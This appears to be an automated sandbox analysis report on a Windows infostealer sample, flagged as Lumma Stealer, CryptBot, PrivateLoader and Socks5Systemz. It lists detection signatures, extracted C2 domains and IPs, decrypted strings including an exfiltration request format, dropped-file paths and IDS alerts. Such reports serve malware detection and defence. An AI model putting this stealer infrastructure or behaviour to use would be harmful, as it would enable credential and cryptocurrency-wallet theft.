Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1521590
MD5: 731200ce89a30b22a5530838e57862f3
SHA1: 0c86827c47e040d82869846c68bedb9d8afbcde0
SHA256: b39525df56e9d5f26067add74133154b651ca91d4201302ce505444d00ac6693
Tags: NET, exe, MSIL, user-jstrosch

Detection

LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5Systemz
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
Yara detected LummaC Stealer
Yara detected Neoreklami
Yara detected PrivateLoader
Yara detected Socks5Systemz
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates HTML files with .exe extension (expired dropper behavior)
Drops PE files to the document folder of the user
Drops large PE files
Found API chain indicative of sandbox detection
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Modifies Windows Defender protection settings
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: CryptBot
Description: A typical infostealer, capable of obtaining credentials for browsers, cryptocurrency wallets, browser cookies and credit cards, and of creating screenshots of the infected system. All stolen data is bundled into a zip file that is uploaded to the C2.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Name: PrivateLoader
Description: According to Sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader

AV Detection

Source: 50.2.BitLockerToGo.exe.260000.0.unpack Malware Configuration Extractor: LummaC {"C2 url": ["drawzhotdog.shop", "gutterydhowi.shop", "ghostreedmnu.shop", "reinforcenh.shop", "fragnantbui.shop", "stogeneratmns.shop", "vozmeatillu.shop", "offensivedzvju.shop"], "Build id": "9mkWlh--RaUFPPPp"}
Source: playglock32x64.exe.8056.13.memstrmin Malware Configuration Extractor: Socks5Systemz {"C2 list": ["ejrsoyz.ua8a"]}
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe.7876.6.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["01fivevh5pt.top", "analforeverlovyu.top", "fivevh5pt.top", "+fivevh5pt.top"]}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\soft[1] ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Channel2[1].exe ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\CheckTool[1].exe ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\1u2wN0W4Z43Z310SAYDV85NF4w4\Y-Cleaner.exe ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe ReversingLabs: Detection: 23%
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe ReversingLabs: Detection: 26%
Source: file.exe ReversingLabs: Detection: 57%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\ProgramData\Edrax Smart Maker 9.28.47\Edrax Smart Maker 9.28.47.exe Joe Sandbox ML: detected
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: reinforcenh.shop
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: stogeneratmns.shop
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: fragnantbui.shop
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: drawzhotdog.shop
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: vozmeatillu.shop
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: offensivedzvju.shop
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: ghostreedmnu.shop
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: gutterydhowi.shop
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: ghostreedmnu.shop
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: 9mkWlh--RaUFPPPp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0051CCF0 GetModuleHandleA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError, 3_2_0051CCF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0051CF90 SetLastError,GetModuleHandleA,CryptGenRandom, 3_2_0051CF90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0051CEB0 CryptReleaseContext, 3_2_0051CEB0
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_004034B0 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy, 9_2_004034B0
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020C3717 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy, 9_2_020C3717
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0045D4EC GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion, 11_2_0045D4EC
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0045D5A0 ArcFourCrypt, 11_2_0045D5A0
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0045D5B8 ArcFourCrypt, 11_2_0045D5B8
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_10001000 ISCryptGetVersion, 11_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_10001130 ArcFourCrypt, 11_2_10001130

Compliance

Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Unpacked PE file: 9.2.tyq3dazbB0crObgKIDGLxiAO.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Unpacked PE file: 13.2.playglock32x64.exe.400000.0.unpack
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Play Glock_is1
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 173.231.16.77:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.9:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49726 version: TLS 1.2
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: msvcp71.pdbx# source: is-IKU3H.tmp.11.dr
Source: Binary string: c:\rje\tg\e\obj\Release\ojc.pdb source: file.exe
Source: Binary string: BitLockerToGo.pdb source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763568801.0000000001908000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msvcp71.pdb source: is-IKU3H.tmp.11.dr
Source: Binary string: c:\rje\tg\e\obj\Release\ojc.pdb4 source: file.exe
Source: Binary string: BitLockerToGo.pdbGCTL source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763568801.0000000001908000.00000004.00001000.00020000.00000000.sdmp

Spreading

Source: Yara match File source: Process Memory Space: Install.exe PID: 8132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7600, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00540A25 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 3_2_00540A25
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_0040553A FindFirstFileA, 8_2_0040553A
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA, 8_2_004055DE
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0041E01D FindFirstFileExW, 9_2_0041E01D
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_10007EA9 FindFirstFileExW, 9_2_10007EA9
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020DE284 FindFirstFileExW, 9_2_020DE284
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00452A4C FindFirstFileA,GetLastError, 11_2_00452A4C
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004751F8 FindFirstFileA,FindNextFileA,FindClose, 11_2_004751F8
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00464048 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 11_2_00464048
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004644C4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 11_2_004644C4
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00462ABC FindFirstFileA,FindNextFileA,FindClose, 11_2_00462ABC
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00497A74 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, 11_2_00497A74
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user

Networking

Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:49720 -> 84.38.182.221:80
Source: Network traffic Suricata IDS: 2056162 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop) : 192.168.2.9:53223 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.9:49725 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:49724 -> 84.38.182.221:80
Source: Network traffic Suricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.9:49726 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:49727 -> 84.38.182.221:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49749 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49761 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49766 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49768 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49776 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49781 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49778 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49780 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49771 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49783 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49786 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49785 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49784 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49787 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49769 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49790 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49788 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49789 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49777 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49791 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49798 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49796 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49764 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49774 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49800 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49805 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49804 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49799 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49808 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49809 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49812 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49814 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49811 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49772 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49810 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49793 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49794 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49813 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49770 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49802 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49792 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49775 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49797 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49795 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49773 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49806 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49807 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49779 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49801 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49803 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49782 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49725 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49725 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49726 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49726 -> 188.114.96.3:443
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7600, type: MEMORYSTR
Source: Malware configuration extractor URLs: drawzhotdog.shop
Source: Malware configuration extractor URLs: gutterydhowi.shop
Source: Malware configuration extractor URLs: ghostreedmnu.shop
Source: Malware configuration extractor URLs: reinforcenh.shop
Source: Malware configuration extractor URLs: fragnantbui.shop
Source: Malware configuration extractor URLs: stogeneratmns.shop
Source: Malware configuration extractor URLs: vozmeatillu.shop
Source: Malware configuration extractor URLs: offensivedzvju.shop
Source: Malware configuration extractor URLs: ejrsoyz.ua8a
Source: Malware configuration extractor URLs: 01fivevh5pt.top
Source: Malware configuration extractor URLs: analforeverlovyu.top
Source: Malware configuration extractor URLs: fivevh5pt.top
Source: Malware configuration extractor URLs: +fivevh5pt.top
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: VUi4VlAeU5mHTySwb10PMAu9.exe.3.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: PXmC5_sqNQv8jWyecSd7ycvv.exe.3.dr
Source: global traffic TCP traffic: 192.168.2.9:49750 -> 89.105.201.183:2023
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Sep 2024 22:53:22 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Sat, 28 Sep 2024 17:54:38 GMTETag: "982000-62331aa50f9f7"Accept-Ranges: bytesContent-Length: 9969664Content-Type: application/x-msdownload
